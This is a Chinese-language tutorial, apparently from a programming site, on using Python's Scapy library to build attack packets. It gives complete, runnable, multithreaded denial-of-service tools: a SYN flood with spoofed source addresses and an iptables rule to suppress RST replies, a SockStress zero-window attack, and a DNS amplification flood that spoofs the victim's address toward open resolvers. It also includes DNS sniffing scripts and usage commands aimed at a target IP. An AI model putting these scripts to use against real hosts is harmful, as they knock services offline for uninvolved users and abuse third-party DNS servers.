Python使用Scapy實(shí)現(xiàn)構(gòu)造特殊數(shù)據(jù)包
Scapy是一款Python庫(kù),可用于構(gòu)建、發(fā)送、接收和解析網(wǎng)絡(luò)數(shù)據(jù)包。除了實(shí)現(xiàn)端口掃描外,它還可以用于實(shí)現(xiàn)各種網(wǎng)絡(luò)安全工具,例如SynFlood攻擊,Sockstress攻擊,DNS查詢攻擊,ARP攻擊,ARP中間人等。這些工具都是基于構(gòu)造、發(fā)送和解析網(wǎng)絡(luò)數(shù)據(jù)包來(lái)實(shí)現(xiàn)的,可以用于模擬各種網(wǎng)絡(luò)攻擊,測(cè)試網(wǎng)絡(luò)安全防御措施等。Scapy是網(wǎng)絡(luò)安全領(lǐng)域中非常有用的工具之一。
1.SynFlood
Syn-Flood(Syn洪水攻擊)是一種常見(jiàn)的DoS拒絕服務(wù)攻擊方式,也被稱為TCP Syn-Flood攻擊。攻擊者利用TCP連接建立過(guò)程中的漏洞,向目標(biāo)主機(jī)發(fā)送大量的TCP連接請(qǐng)求(SYN),目標(biāo)主機(jī)在收到這些請(qǐng)求后會(huì)回復(fù)一個(gè)SYN/ACK確認(rèn)請(qǐng)求,但是攻擊者并不回復(fù)ACK確認(rèn),使得目標(biāo)主機(jī)在等待ACK確認(rèn)的過(guò)程中,消耗大量的系統(tǒng)資源和帶寬,從而導(dǎo)致目標(biāo)主機(jī)無(wú)法正常處理合法的連接請(qǐng)求,使得正常用戶無(wú)法訪問(wèn)該服務(wù)。

默認(rèn)情況下每一種系統(tǒng)的并發(fā)連接都是有限制的,如果惡意攻擊持續(xù)進(jìn)行,將會(huì)耗盡系統(tǒng)有限的連接池資源。在Windows系統(tǒng)下這個(gè)半開(kāi)連接數(shù)是10個(gè),具體來(lái)說(shuō)攻擊者可以通過(guò)偽造地址對(duì)服務(wù)器發(fā)起SYN請(qǐng)求,服務(wù)器就會(huì)回應(yīng)SYN+ACK此時(shí)攻擊者的主機(jī)如果拒絕發(fā)送RST+ACK標(biāo)志,那么服務(wù)器接收不到RST請(qǐng)求,就會(huì)認(rèn)為客戶端還沒(méi)有準(zhǔn)備好,會(huì)重試3-5次并且等待一個(gè)SYN Time超時(shí)(一般30秒-2分鐘)后,丟棄這個(gè)連接,雖然有丟包的功能,但是如果攻擊者的攻擊速度大于目標(biāo)主機(jī)的丟包速度,那么TCP連接池將被填滿,此時(shí)正常用戶將會(huì)無(wú)法連接到程序中而導(dǎo)致拒絕服務(wù)。
由于在發(fā)送SYN報(bào)文后我們不希望接收到目標(biāo)主機(jī)回復(fù)給我們的RST標(biāo)志,所以需要執(zhí)行如下這條防火墻命令,將發(fā)送到被害IP的RST包丟棄,這樣就可以構(gòu)造出一個(gè)非完全TCP鏈接,也正是我們想要的效果。
iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 被害主機(jī)IP地址 -j DROP
接著就是完整的攻擊代碼,這段代碼需要在Linux系統(tǒng)下運(yùn)行,在運(yùn)行之前需要指定iface網(wǎng)卡接口,當(dāng)指定后即可調(diào)用攻擊代碼代碼片段實(shí)現(xiàn)發(fā)包。
#coding=utf-8
import argparse
import socket,sys,random,threading
from scapy.all import *
scapy.config.conf.iface = 'ens32'
# 攻擊目標(biāo)主機(jī)TCP/IP半開(kāi)放連接數(shù)
def synflood(target,dstport):
# 加鎖
semaphore.acquire()
issrc = '%i.%i.%i.%i' % (random.randint(1,254),random.randint(1,254),random.randint(1,254), random.randint(1,254))
isport = random.randint(1,65535)
ip = IP(src = issrc,dst = target)
syn = TCP(sport = isport, dport = dstport, flags = 'S')
send(ip / syn, verbose = 0)
print("[+] sendp --> {} {}".format(target,isport))
# 釋放鎖
semaphore.release()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-H","--host",dest="host",type=str,help="輸入被攻擊主機(jī)IP地址")
parser.add_argument("-p","--port",dest="port",type=int,help="輸入被攻擊主機(jī)端口")
parser.add_argument("--type",dest="types",type=str,help="指定攻擊的載荷 (synflood)")
parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻擊并發(fā)線程數(shù)")
args = parser.parse_args()
# 使用方式: main.py --type=synflood -H 192.168.1.1 -p 80 -t 10
if args.types == "synflood" and args.host and args.port and args.thread:
semaphore = threading.Semaphore(args.thread)
while True:
t = threading.Thread(target=synflood,args=(args.host,args.port))
t.start()
else:
parser.print_help()
讀者可自行運(yùn)行上述代碼,通過(guò)傳入--type=synflood -H 192.168.1.1 -p 80 -t 10參數(shù),其含義是對(duì)192.168.1.1主機(jī)的80端口執(zhí)行洪水攻擊,并啟用10個(gè)線程執(zhí)行,輸出效果圖如下所示;

2.SockStress
SockStress 全連接攻擊屬于TCP全連接攻擊,其攻擊的原理與SYN Flood攻擊類似,但是它使用完整的TCP三次握手,這使得它更難以檢測(cè)和防御。該攻擊的關(guān)鍵點(diǎn)就在于,攻擊主機(jī)將windows窗口緩沖設(shè)置為0實(shí)現(xiàn)拒絕服務(wù)。攻擊者向目標(biāo)發(fā)送一個(gè)很小的流量,但是會(huì)造成產(chǎn)生的攻擊流量是一個(gè)巨大的,該攻擊消耗的是目標(biāo)系統(tǒng)的CPU/內(nèi)存資源,使用低配版的電腦,依然可以讓龐大的服務(wù)器拒絕服務(wù),也稱之為放大攻擊。

該攻擊方式通過(guò)與目標(biāo)主機(jī)建立大量的socket連接,并且都是完整連接,最后的ACK包,將Window窗口大小設(shè)置為0,客戶端不接收數(shù)據(jù),而服務(wù)器此時(shí)會(huì)認(rèn)為客戶端緩沖區(qū)還沒(méi)有準(zhǔn)備好,從而一直等待下去(持續(xù)等待將使目標(biāo)機(jī)器內(nèi)存一直被占用),由于是異步攻擊,所以單機(jī)模式也可以拒絕高配的服務(wù)器。
#coding=utf-8
import argparse
import socket,sys,random,threading
from scapy.all import *
scapy.config.conf.iface = 'ens32'
# 攻擊目標(biāo)主機(jī)的Window窗口
def sockstress(target,dstport):
# 加鎖
semaphore.acquire()
isport = random.randint(0,65535)
response = sr1(IP(dst=target)/TCP(sport=isport,dport=dstport,flags="S"),timeout=1,verbose=0)
send(IP(dst=target)/ TCP(dport=dstport,sport=isport,window=0,flags="A",ack=(response[TCP].seq +1))/'\x00\x00',verbose=0)
print("[+] sendp --> {} {}".format(target,isport))
# 釋放鎖
semaphore.release()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-H","--host",dest="host",type=str,help="輸入被攻擊主機(jī)IP地址")
parser.add_argument("-p","--port",dest="port",type=int,help="輸入被攻擊主機(jī)端口")
parser.add_argument("--type",dest="types",type=str,help="指定攻擊的載荷 (sockstress)")
parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻擊并發(fā)線程數(shù)")
args = parser.parse_args()
# 使用方式: main.py --type=sockstress -H 192.168.1.1 -p 80 -t 10
if args.types == "sockstress" and args.host and args.port and args.thread:
semaphore = threading.Semaphore(args.thread)
while True:
t = threading.Thread(target=sockstress,args=(args.host,args.port))
t.start()
else:
parser.print_help()
這段代碼的使用方法與SynFlood攻擊保持一致,通過(guò)指定--type=sockstress -H 192.168.1.1 -p 80 -t 100即可實(shí)現(xiàn)對(duì)特定主機(jī)特定端口的拒絕服務(wù),輸出效果如下圖所示;

3.DNSSelect
DNS查詢放大攻擊是一種利用域名系統(tǒng)(DNS)服務(wù)器的缺陷來(lái)放大攻擊流量的網(wǎng)絡(luò)攻擊。攻擊者通過(guò)向具有惡意域名的DNS服務(wù)器發(fā)送DNS查詢請(qǐng)求,該服務(wù)器會(huì)向被攻擊者發(fā)送響應(yīng),但是響應(yīng)內(nèi)容比請(qǐng)求更大。攻擊者可以利用這種響應(yīng)的放大效應(yīng),將大量流量發(fā)送到被攻擊者的系統(tǒng)上,從而導(dǎo)致系統(tǒng)資源的耗盡和服務(wù)不可用。
該攻擊可以通過(guò)欺騙和利用DNS協(xié)議的特性進(jìn)行,通常利用UDP端口53來(lái)執(zhí)行。攻擊者會(huì)偽造一個(gè)源IP地址,向DNS服務(wù)器發(fā)送一個(gè)查詢請(qǐng)求,請(qǐng)求的數(shù)據(jù)包比較小,但是響應(yīng)的數(shù)據(jù)包比請(qǐng)求的數(shù)據(jù)包大很多,這就導(dǎo)致了放大的效果。
DNS是域名系統(tǒng)(Domain Name System)的縮寫(xiě),是一個(gè)用于將域名轉(zhuǎn)換為IP地址的分布式數(shù)據(jù)庫(kù)系統(tǒng)。在進(jìn)行DNS查詢時(shí),客戶端會(huì)向DNS服務(wù)器發(fā)送DNS查詢請(qǐng)求(DNS Query,DNSQR)包,DNS服務(wù)器則會(huì)回應(yīng)DNS響應(yīng)(DNS Response,DNSRR)包。
一個(gè)DNSQR包含以下重要的字段:
- 問(wèn)題域名(QNAME):需要進(jìn)行查詢的域名
- 查詢類型(QTYPE):查詢的類型,例如A記錄、AAAA記錄、CNAME記錄等
- 查詢類(QCLASS):查詢的類別,通常為Internet(IN)
一個(gè)DNSRR包含以下重要的字段:
- 資源記錄名稱(RR NAME):資源記錄的名稱
- 資源記錄類型(TYPE):資源記錄的類型,例如A記錄、AAAA記錄、CNAME記錄等
- 資源記錄類(CLASS):資源記錄的類別,通常為Internet(IN)
- 生存時(shí)間(TTL):資源記錄在DNS緩存中的生存時(shí)間
- 數(shù)據(jù)長(zhǎng)度(RDLENGTH):資源記錄的數(shù)據(jù)長(zhǎng)度
- 資源記錄數(shù)據(jù)(RDATA):資源記錄的數(shù)據(jù),例如IPv4地址、IPv6地址、域名等
我們首先使用Scapy庫(kù)解析DNSRR數(shù)據(jù)包,DNSRR是DNS協(xié)議中的一種資源記錄(Resource Record),用于表示DNS服務(wù)器返回的回答記錄。其格式包括了Name(域名)、Type(資源記錄類型)、Class(資源記錄類別)、TTL(生存時(shí)間)、RDLENGTH(數(shù)據(jù)長(zhǎng)度)、RDATA(數(shù)據(jù))。
在DNS響應(yīng)中,通常會(huì)有多個(gè)DNSRR記錄,每個(gè)記錄包含一個(gè)域名對(duì)應(yīng)的IP地址或其他資源信息。例如,一個(gè)A記錄的DNSRR會(huì)包含一個(gè)域名和一個(gè)IPv4地址。而MX記錄的DNSRR則會(huì)包含一個(gè)域名和一個(gè)郵件服務(wù)器的優(yōu)先級(jí)和地址,如下代碼實(shí)現(xiàn)了分別提取出含有查詢的域名和對(duì)應(yīng)的IP的rrname和rdata變量,并將這些數(shù)據(jù)輸出到屏幕。
#coding=utf-8
from scapy.all import *
from IPy import IP as PYIP
# 檢查數(shù)據(jù)包的IP層,提取出IP和TTL字段的值
def Get_TTL(pkt):
try:
if pkt.haslayer(IP):
ip_src = pkt.getlayer(IP).src
ip_sport = pkt.getlayer(IP).sport
ip_dst = pkt.getlayer(IP).dst
ip_dport = pkt.getlayer(IP).dport
ip_ttl = str(pkt.ttl)
print("[+] 源地址: %15s:%-5s --> 目標(biāo)地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl))
except Exception:
pass
# 獲取本機(jī)發(fā)送出去的DNS請(qǐng)求所對(duì)應(yīng)的網(wǎng)站地址
def GetDNSRR(pkt):
if pkt.haslayer(DNSRR):
rrname = pkt.getlayer(DNSRR).rrname
rdata = pkt.getlayer(DNSRR).rdata
ttl = pkt.getlayer(DNSRR).ttl
print("[+] 域名: {} --> 別名: {} --> TTL: {}".format(rrname,rdata,ttl))
if __name__=="__main__":
sniff(prn=GetDNSRR,store=0)
讀者可自行運(yùn)行上述代碼,此時(shí)當(dāng)有DNS查詢時(shí),則會(huì)自動(dòng)解析出對(duì)應(yīng)的別名以及該主機(jī)的TTL值,如下圖所示;

接著我們來(lái)解析一下DNSQR,DNSQR是DNS查詢請(qǐng)求的部分,用于DNS協(xié)議的域名解析。DNSQR包含以下字段:
- qname:表示查詢的域名,例如www.lyshark.com
- qtype:表示查詢類型,通常為A記錄、CNAME記錄、MX記錄等
- qclass:表示查詢類別,通常為IN(Internet)
DNSQR記錄通常包含在DNS消息中的請(qǐng)求部分中,請(qǐng)求部分也可以包含多個(gè)DNSQR記錄,每個(gè)記錄對(duì)應(yīng)一個(gè)查詢,解析此類數(shù)據(jù)同樣很容易實(shí)現(xiàn),具體代碼如下所示;
#coding=utf-8
from scapy.all import *
from IPy import IP as PYIP
# 獲取本機(jī)發(fā)送出去的網(wǎng)址請(qǐng)求解析為IP URL --> IP
def GetDNSQR(pkt):
# 判斷是否含有DNSRR且存在UDP端口53
if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
rcode = pkt.getlayer(DNS).rcode
qname = pkt.getlayer(DNSQR).qname
# 若rcode為3,則表示該域名不存在
if rcode == 3:
print("[-] 域名解析不存在")
else:
print("[+] 解析存在:" + str(qname))
if __name__=="__main__":
sniff(prn=GetDNSQR,store=0)
讀者可運(yùn)行上述代碼,此時(shí)即可輸出當(dāng)前系統(tǒng)內(nèi)訪問(wèn)過(guò)的鏈接,輸出效果如下圖所示;

接著我們就來(lái)實(shí)現(xiàn)查詢放大攻擊,查詢放大攻擊的原理是,通過(guò)網(wǎng)絡(luò)中存在的DNS服務(wù)器資源,對(duì)目標(biāo)主機(jī)發(fā)起拒絕服務(wù)攻擊,通過(guò)偽造源地址為被攻擊目標(biāo)的地址,向DNS遞歸服務(wù)器發(fā)起查詢請(qǐng)求,此時(shí)由于源IP是偽造的,固在DNS服務(wù)器回包的時(shí)候,會(huì)默認(rèn)回給偽造的IP地址,從而使DNS服務(wù)成為了流量放大和攻擊的實(shí)施者,通過(guò)查詢大量的DNS服務(wù)器,從而實(shí)現(xiàn)反彈大量的查詢流量,導(dǎo)致目標(biāo)主機(jī)查詢帶寬被塞滿,實(shí)現(xiàn)DDOS的目的。
查詢放大攻擊的實(shí)施依賴于海量的DNS服務(wù)器資源,所以在執(zhí)行攻擊時(shí)需要自行尋找這些服務(wù)器資源,當(dāng)找到后則可存儲(chǔ)到文件內(nèi),當(dāng)需要使用時(shí)首先調(diào)用Inspect_DNS_Usability函數(shù)依次驗(yàn)證DNS服務(wù)器的可用性,并將可用的地址保存為pass.log文件,當(dāng)需要發(fā)起攻擊時(shí)可通過(guò)DNS_Flood調(diào)用并傳入合法的DNS服務(wù)器地址實(shí)現(xiàn)DNS查詢。
import os,sys,threading,time
from scapy.all import *
import argparse
def Inspect_DNS_Usability(filename):
proxy_list = []
fp = open(filename,"r")
for i in fp.readlines():
try:
addr = i.replace("\n","")
respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2)
if respon != "":
proxy_list.append(str(respon["IP"].src))
except Exception:
pass
return proxy_list
def DNS_Flood(target,dns):
# 構(gòu)造IP數(shù)據(jù)包
ip_pack = IP()
ip_pack.src = target
ip_pack.dst = dns
# ip_pack.src = "192.168.1.2"
# ip_pack.dst = "8.8.8.8"
# 構(gòu)造UDP數(shù)據(jù)包
udp_pack = UDP()
udp_pack.sport = 53
udp_pack.dport = 53
# 構(gòu)造DNS數(shù)據(jù)包
dns_pack = DNS()
dns_pack.rd = 1
dns_pack.qdcount = 1
# 構(gòu)造DNSQR解析
dnsqr_pack = DNSQR()
dnsqr_pack.qname = "baidu.com"
dnsqr_pack.qtype = 255
dns_pack.qd = dnsqr_pack
respon = (ip_pack/udp_pack/dns_pack)
sr1(respon)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--mode",dest="mode",help="選擇執(zhí)行命令<check=檢查DNS可用性/flood=攻擊>")
parser.add_argument("-f","--file",dest="file",help="指定一個(gè)DNS字典,里面存儲(chǔ)DNSIP地址")
parser.add_argument("-t",dest="target",help="輸入需要攻擊的IP地址")
args = parser.parse_args()
# 使用方式: main.py --mode=check -f xxx.log
if args.mode == "check" and args.file:
proxy = Inspect_DNS_Usability(args.file)
fp = open("pass.log","w+")
for item in proxy:
fp.write(item + "\n")
fp.close()
print("[+] DNS地址檢查完畢,當(dāng)前可用DNS保存為 pass.log")
# 使用方式: main.py --mode=flood -f xxx.log -t 192.168.1.1
elif args.mode == "flood" and args.target and args.file:
with open(args.file,"r") as fp:
countent = [line.rstrip("\n") for line in fp]
while True:
randomDNS = str(random.sample(countent,1)[0])
print("[+] 目標(biāo)主機(jī): {} -----> 隨機(jī)DNS: {}".format(args.target,randomDNS))
t = threading.Thread(target=DNS_Flood,args=(args.target,randomDNS,))
t.start()
else:
parser.print_help()
讀者可保存這段代碼,并自行準(zhǔn)備一些DNS服務(wù)器地址,放入到dns.log目錄下,通過(guò)執(zhí)行如下所示的命令即可依次驗(yàn)證服務(wù)器地址可用性,如果可用則自動(dòng)保存到pass.log文件內(nèi),輸出效果如下所示;

當(dāng)需要對(duì)特定主機(jī)發(fā)起攻擊時(shí),可執(zhí)行如下命令,其中-t帶指的則是需要攻擊的IP地址,輸出效果圖如下所示;

到此這篇關(guān)于Python使用Scapy實(shí)現(xiàn)構(gòu)造特殊數(shù)據(jù)包的文章就介紹到這了,更多相關(guān)Python Scapy構(gòu)造特殊數(shù)據(jù)包內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
Python使用Socket(Https)Post登錄百度的實(shí)現(xiàn)代碼
以前都是用一些高級(jí)模塊,封裝的比較好,今天嘗試使用socket模塊登錄百度,弄了半天才弄好,主要由于百度在登陸頁(yè)使用了https,我們需要對(duì)socket進(jìn)行一定處理2012-05-05
Django User 模塊之 AbstractUser 擴(kuò)展詳解
這篇文章主要介紹了Django User 模塊之 AbstractUser 擴(kuò)展詳解,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧2020-03-03
python實(shí)現(xiàn)比較文件內(nèi)容異同
這篇文章主要為大家詳細(xì)介紹了python實(shí)現(xiàn)比較文件內(nèi)容異同,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2018-06-06
簡(jiǎn)單講解Python中的字符串與字符串的輸入輸出
這篇文章主要介紹了Python中的字符串與字符串的輸入輸出,Python3.x版本中默認(rèn)以Unicode為編碼,省去了不少麻煩,需要的朋友可以參考下2016-03-03
用Python實(shí)現(xiàn)一個(gè)簡(jiǎn)單的抽獎(jiǎng)小程序
最近開(kāi)始學(xué)習(xí)python相關(guān)知識(shí),看最近有不少隨機(jī)抽獎(jiǎng)小程序,自己也做一個(gè)試試,下面這篇文章主要給大家介紹了關(guān)于如何利用Python實(shí)現(xiàn)一個(gè)簡(jiǎn)單的抽獎(jiǎng)小程序的相關(guān)資料,需要的朋友可以參考下2023-05-05

